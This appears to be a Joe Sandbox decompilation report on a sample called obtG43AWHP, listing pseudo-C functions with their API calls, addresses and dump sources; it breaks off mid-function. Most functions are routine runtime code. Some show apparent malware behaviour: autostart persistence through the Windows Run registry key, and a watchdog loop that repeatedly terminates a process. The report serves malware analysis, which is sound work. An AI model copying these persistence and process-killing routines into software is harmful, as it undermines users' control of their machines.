    Function 0300521F, Relevance: 7.6, APIs: 5, Instructions: 54
    C-Code - Quality: 100%
    			E0300521F() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t25;
				signed int _t34;

				_t14 =  *0x300bbe4; // 0xbb40e64e
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
					GetSystemTimeAsFileTime( &_v12);
					_t16 = GetCurrentProcessId();
					_t17 = GetCurrentThreadId();
					_t18 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t22 = _v16 ^ _v20.LowPart;
					_t34 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
					if(_t34 != 0xbb40e64e) {
						if((0xffff0000 & _t34) == 0) {
							_t22 = (_t34 | 0x00004711) << 0x10;
							_t34 = _t34 | _t22;
						}
					} else {
						_t34 = 0xbb40e64f;
					}
					 *0x300bbe4 = _t34;
					 *0x300bbe8 =  !_t34;
					return _t22;
				} else {
					_t25 =  !_t14;
					 *0x300bbe8 = _t25;
					return _t25;
				}
			}













    0x03005227
    0x0300522c
    0x03005230
    0x03005242
    0x03005256
    0x03005262
    0x0300526a
    0x03005272
    0x0300527e
    0x03005287
    0x0300528a
    0x0300528e
    0x03005299
    0x030052a2
    0x030052a5
    0x030052a5
    0x03005290
    0x03005290
    0x03005290
    0x030052a7
    0x030052af
    0x00000000
    0x03005248
    0x03005248
    0x0300524a
    0x00000000
    0x0300524a

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 03005256
    • GetCurrentProcessId.KERNEL32 ref: 03005262
    • GetCurrentThreadId.KERNEL32 ref: 0300526A
    • GetTickCount.KERNEL32 ref: 03005272
    • QueryPerformanceCounter.KERNEL32(?), ref: 0300527E
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 0040A038, Relevance: 7.6, APIs: 5, Instructions: 50
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40a0cf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
				_t29 = E00407174(0x40a0e4, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x454764;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040A0D6);
				return E00403E88( &_v8);
			}










    0x0040a038
    0x0040a03b
    0x0040a040
    0x0040a041
    0x0040a046
    0x0040a049
    0x0040a05f
    0x0040a071
    0x0040a07b
    0x0040a08b
    0x0040a090
    0x0040a095
    0x0040a09a
    0x0040a09a
    0x0040a0a0
    0x0040a0a3
    0x0040a0a3
    0x0040a0b4
    0x0040a0b4
    0x0040a0bb
    0x0040a0be
    0x0040a0c1
    0x0040a0ce

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0040A0E8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40a2b2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00403E88(__edx);
				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404148(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x419108], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404150(_t122, 0x40a30c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404070();
												E00404150(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404150(_t122, 0x40a300);
										_t92 = _t92 + 1;
									}
								} else {
									E00404150(_t122, 0x40a2ec);
									_t92 = _t92 + 3;
								}
							} else {
								E00404150(_t122, 0x40a2d8);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040B04C(_t124, _t92);
							E004043A8(_t124, _v8, _t92,  &_v20);
							E00404150(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x45473c; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00403EDC(_t122, _t124);
					} else {
						while(_t92 <= E00404148(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404070();
									E00404150(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040A2B9);
				return E00403EAC( &_v24, 4);
			}























    0x0040a0e8
    0x0040a0ed
    0x0040a0ee
    0x0040a0ef
    0x0040a0f0
    0x0040a0f1
    0x0040a0f5
    0x0040a0f7
    0x0040a0fb
    0x0040a0fc
    0x0040a101
    0x0040a104
    0x0040a107
    0x0040a10e
    0x0040a126
    0x0040a13e
    0x0040a288
    0x0040a28a
    0x0040a28f
    0x0040a291
    0x00000000
    0x00000000
    0x0040a1a7
    0x0040a1ac
    0x0040a1b3
    0x0040a1f1
    0x0040a1f6
    0x0040a1f8
    0x0040a217
    0x0040a21c
    0x0040a21e
    0x0040a23f
    0x0040a244
    0x0040a246
    0x0040a25b
    0x0040a25b
    0x0040a25d
    0x0040a263
    0x0040a26a
    0x0040a25f
    0x0040a25f
    0x0040a261
    0x0040a278
    0x0040a282
    0x00000000
    0x00000000
    0x00000000
    0x0040a261
    0x0040a248
    0x0040a24f
    0x0040a254
    0x0040a254
    0x0040a220
    0x0040a227
    0x0040a22c
    0x0040a22c
    0x0040a1fa
    0x0040a201
    0x0040a206
    0x0040a206
    0x0040a287
    0x0040a287
    0x0040a1b5
    0x0040a1be
    0x0040a1cc
    0x0040a1d6
    0x0040a1db
    0x0040a1db
    0x0040a1b3
    0x0040a144
    0x0040a144
    0x0040a149
    0x0040a14c
    0x0040a15a
    0x0040a156
    0x0040a156
    0x0040a156
    0x0040a15e
    0x0040a199
    0x0040a160
    0x0040a185
    0x0040a166
    0x0040a166
    0x0040a168
    0x0040a16a
    0x0040a16c
    0x0040a175
    0x0040a17f
    0x0040a17f
    0x0040a16c
    0x0040a184
    0x0040a184
    0x0040a184
    0x0040a190
    0x0040a15e
    0x0040a297
    0x0040a299
    0x0040a29c
    0x0040a29f
    0x0040a2b1

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0041763C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				void* _t22;
				void* _t35;
				intOrPtr* _t38;
				void* _t47;

				_t47 = __ecx;
				_t38 = __edx;
				E00403E88(__ecx);
				if(_t38 == 0) {
					return E00403EDC(_t47, "0.0.0.0");
				}
				if( *_t38 + 0xd0 - 0xa >= 0) {
					_t22 = E00404348(_t38);
					_push(_t22);
					L0040C4F8();
					if(_t22 != 0) {
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v24 = 0;
						_v20 = 0;
						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
					}
				} else {
					_t35 = E00404348(_t38);
					_push(_t35);
					L0040C4C8();
					_t22 = _t35 + 1;
					if(_t22 != 0) {
						return E00403EDC(_t47, _t38);
					}
				}
				return _t22;
			}















    0x00417642
    0x00417644
    0x00417648
    0x0041764f
    0x00000000
    0x004176e4
    0x0041765b
    0x0041767a
    0x0041767f
    0x00417680
    0x00417687
    0x00417695
    0x00417699
    0x004176a3
    0x004176a7
    0x004176b1
    0x004176b5
    0x004176bf
    0x004176c3
    0x00000000
    0x004176d6
    0x0041765d
    0x0041765f
    0x00417664
    0x00417665
    0x0041766a
    0x0041766b
    0x00000000
    0x00417671
    0x0041766b
    0x004176ef

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 004185E8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				char _v20;
				int _t28;
				char* _t41;
				intOrPtr _t47;
				void* _t51;

				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t51);
				_push(0x418692);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
				_t41 = E00404348(_v12);
				E00404080( &_v20, _t41);
				_t28 = E00404148(_v20);
				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
				RegCloseKey(_v16);
				_pop(_t47);
				 *[fs:eax] = _t47;
				_push(E00418699);
				E00403E88( &_v20);
				return E00403EAC( &_v12, 2);
			}











    0x004185f1
    0x004185f4
    0x004185f7
    0x004185fd
    0x00418605
    0x0041860c
    0x0041860d
    0x00418612
    0x00418615
    0x0041862d
    0x0041863a
    0x00418641
    0x00418649
    0x00418661
    0x0041866a
    0x00418671
    0x00418674
    0x00418677
    0x0041867f
    0x00418691

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00418B04, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
    C-Code - Quality: 72%
    			E00418B04() {
				char _v8;
				intOrPtr* _t3;
				long _t13;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t26;

				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
				_push(0);
				_t26 = 0;
				_push(_t24);
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				L2:
				E00403F20( &_v8,  *0x454a5c);
				E00418A14(0x454a5c, _t20, _t21);
				E00404294(_v8,  *0x454a5c);
				if(_t26 != 0) {
					_t26 = E00418560(_t26);
					if(_t26 == 0) {
						_t13 =  *0x454a60; // 0x0
						TerminateProcess(OpenProcess(1, 0, _t13), 0);
					}
				}
				Sleep("h N");
				goto L2;
			}










    0x00418b06
    0x00418b0f
    0x00418b17
    0x00418b19
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00000000

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00418B0C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
    C-Code - Quality: 75%
    			E00418B0C() {
				char _v8;
				long _t10;
				void* _t17;
				void* _t18;
				intOrPtr _t20;
				void* _t21;

				_push(0);
				_t21 = 0;
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				while(1) {
					E00403F20( &_v8,  *0x454a5c);
					E00418A14(0x454a5c, _t17, _t18);
					E00404294(_v8,  *0x454a5c);
					if(_t21 != 0) {
						_t21 = E00418560(_t21);
						if(_t21 == 0) {
							_t10 =  *0x454a60; // 0x0
							TerminateProcess(OpenProcess(1, 0, _t10), 0);
						}
					}
					Sleep("h N");
				}
			}









    0x00418b0f
    0x00418b17
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00418b65

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 03003F3E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    C-Code - Quality: 100%
    			E03003F3E(intOrPtr _a4) {
				struct HINSTANCE__* _t2;

				_t2 = GetModuleHandleW(L"mscoree.dll");
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t2, "CorExitProcess");
					if(_t2 != 0) {
						return _t2->i(_a4);
					}
				}
				return _t2;
			}




    0x03003f48
    0x03003f50
    0x03003f58
    0x03003f60
    0x00000000
    0x03003f65
    0x03003f60
    0x03003f68

    APIs
    • GetModuleHandleW.KERNEL32(mscoree.dll,?,03003F76,?,?,030089F4,000000FF,0000001E,00000001,00000000,00000000,?,030068FF,?,00000001,?), ref: 03003F48
    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,03003F76,?,?,030089F4,000000FF,0000001E,00000001,00000000,00000000,?,030068FF,?,00000001), ref: 03003F58
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 0040BAA0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    C-Code - Quality: 100%
    			E0040BAA0() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x41912c = _t1;
				}
				if( *0x41912c == 0) {
					 *0x41912c = E004076D4;
					return E004076D4;
				}
				return _t1;
			}





    0x0040baa6
    0x0040baab
    0x0040baaf
    0x0040bab7
    0x0040babc
    0x0040babc
    0x0040bac8
    0x0040bacf
    0x00000000
    0x0040bacf
    0x0040bad5

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 00409161, Relevance: 6.4, Strings: 5, Instructions: 128
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
				signed int _t166;
				signed int _t168;
				signed int _t170;
				signed int _t172;
				signed int _t181;
				void* _t183;
				intOrPtr _t224;
				intOrPtr _t227;
				signed int _t232;
				void* _t250;
				void* _t252;
				intOrPtr _t272;
				signed int _t281;
				void* _t282;

				L0:
				while(1) {
					L0:
					E004089D8(_t282);
					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
					if(E004077C0(_t281, 5, 0x409418) != 0) {
						_t166 = E004077C0(_t281, 3, 0x409420);
						__eflags = _t166;
						if(_t166 != 0) {
							_t168 = E004077C0(_t281, 4, 0x409424);
							__eflags = _t168;
							if(_t168 != 0) {
								_t170 = E004077C0(_t281, 4, 0x40942c);
								__eflags = _t170;
								if(_t170 != 0) {
									_t172 = E004077C0(_t281, 3, 0x409434);
									__eflags = _t172;
									if(_t172 != 0) {
										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									} else {
										E004089A0(_t282);
										_pop(_t250);
										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
									}
								} else {
									E004089A0(_t282);
									_pop(_t252);
									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								}
							} else {
								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
								if( *((short*)(_t282 - 0x16)) >= 0xc) {
									_t224 =  *0x454694; // 0x0
									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
								} else {
									_t227 =  *0x454690; // 0x0
									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
								}
								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								 *((char*)(_t282 - 0x1e)) = 1;
							}
						} else {
							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
							if( *((short*)(_t282 - 0x16)) >= 0xc) {
								__eflags = _t281;
							}
							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
							 *((char*)(_t282 - 0x1e)) = 1;
						}
					} else {
						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
						if( *((short*)(__ebp - 0x16)) >= 0xc) {
							__esi = __esi + 3;
							__eflags = __esi;
						}
						__eax =  *(__ebp + 8);
						__edx = 2;
						__eax = __esi;
						__eax = E004088C4(2,  *(__ebp + 8));
						 *(__ebp - 4) =  *(__ebp - 4) + 4;
						 *((char*)(__ebp - 0x1e)) = 1;
					}
					while(1) {
						L109:
						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
						if(_t164 == 0) {
							break;
						}
						L1:
						 *(_t282 - 5) = _t164;
						asm("bt [0x419108], eax");
						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t181 =  *(_t282 - 5);
							__eflags = _t181 + 0x9f - 0x1a;
							if(_t181 + 0x9f - 0x1a < 0) {
								_t181 = _t181 - 0x20;
								__eflags = _t181;
							}
							L5:
							__eflags = _t181 + 0xbf - 0x1a;
							if(_t181 + 0xbf - 0x1a >= 0) {
								L10:
								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
								__eflags = _t183 - 0x38;
								if(_t183 > 0x38) {
									L108:
									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									continue;
								}
								L11:
								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
									case 0:
										goto L108;
									case 1:
										L12:
										E00408974(_t282);
										E004089A0(_t282);
										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
										} else {
											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
										}
										goto L109;
									case 2:
										L15:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x24;
										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
										__eax =  *(__ebp - 0x24);
										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
										goto L109;
									case 3:
										L16:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x28;
										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
										__eax =  *(__ebp - 0x28);
										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
										goto L109;
									case 4:
										L17:
										E00408974(__ebp) = E004089A0(__ebp);
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
										if(__eflags < 0) {
											__eax =  *(__ebp + 8);
											__eax =  *(__ebp - 0x10) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
											} else {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											}
										}
										goto L109;
									case 5:
										L23:
										E00408974(__ebp) =  *(__ebp - 0xc);
										__eax =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags = __eax;
										if(__eflags < 0) {
											E004089A0(__ebp) =  *(__ebp + 8);
											__eax =  *(__ebp - 0x12) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eflags == 0) {
													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
												} else {
													__eax = __eax - 1;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__ebp + 8);
														__eax =  *0x454684; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													} else {
														__eax =  *(__ebp + 8);
														__eax =  *0x454688; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													}
												}
											}
										}
										goto L109;
									case 6:
										L33:
										__eax = E00408974(__ebp);
										__eax = E004089D8(__ebp);
										 *(__ebp - 0x1f) = 0;
										__esi =  *(__ebp - 4);
										while(1) {
											L52:
											__al =  *__esi;
											__eflags =  *__esi;
											if( *__esi == 0) {
												break;
											}
											L34:
											__eax = __eax & 0x000000ff;
											__eflags = __eax;
											asm("bt [0x419108], eax");
											if(__eax >= 0) {
												L36:
												__eax = 0;
												__al =  *__esi;
												__eflags = 0 - 0x48;
												if(0 > 0x48) {
													L42:
													__eax = 0xffffffffffffff9f;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														L45:
														__eflags =  *(__ebp - 0x1f);
														if( *(__ebp - 0x1f) != 0) {
															L51:
															__esi = __esi + 1;
